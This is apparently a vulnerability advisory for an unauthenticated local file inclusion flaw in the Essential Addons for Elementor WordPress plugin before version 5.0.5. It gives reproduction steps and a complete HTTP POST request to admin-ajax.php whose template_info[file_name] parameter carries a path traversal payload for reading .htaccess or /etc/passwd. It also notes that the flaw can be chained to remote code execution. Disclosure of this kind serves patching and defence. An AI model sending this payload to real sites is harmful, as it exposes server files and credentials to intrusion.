Essential Addons for Elementor < 5.0.5 - Unauthenticated LFI

2022-01-3100:00:00

Wai Yan Myo Thet

275

elementor

unauthenticated

lfi

security

vulnerability

ajax

exploit

product grid

EPSS

0.003

Percentile

65.5%

JSON

The plugin does not validate and sanitise some template data before it them in include statements, which could allow unauthenticated attackers to perform Local File Inclusion attack and read arbitrary files on the server, this could also lead to RCE via user uploaded files or other LFI to RCE techniques.

- Create a simple page and edit with Elementor
- Add a Post Grid with the Show Load More option enabled (in the Layout Settings section of the widget, default is disabled)

- As an unauthenticated user, navigate to that page and intercept the request made when clicking the Load More button
- Change the template_info[file_name] parameter with a payload such as ../../../../../../.htaccess, ../../../../../../../../etc/passwd etc (the template_info[name] is also vulnerable)

POST /wp-admin/admin-ajax.php HTTP/1.1
Accept: */*
Accept-Language: en-GB,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
X-Requested-With: XMLHttpRequest
Content-Length: 396
Connection: close

action=load_more&class=Essential_Addons_Elementor%5CElements%5CPost_Grid&args=orderby%3Ddate%26order%3Ddesc%26ignore_sticky_posts%3D1%26post_status%3Dpublish%26posts_per_page%3D4%26offset%3D0%26post_type%3Dpost&page=2&page_id=5512&widget_id=19f1b2c&nonce=7c9c8da06d&template_info%5Bdir%5D=lite&template_info%5Bfile_name%5D=..%2f..%2f..%2f..%2f..%2f..%2f.htaccess&template_info%5Bname%5D=Post-Grid

The ajax_eael_product_gallery AJAX action (Product Grid widget) is also affected

EPSS

0.003

Percentile

65.5%

JSON

Related for WPEX-ID:0D02B222-E672-4AC0-A1D4-D34E1ECF4A95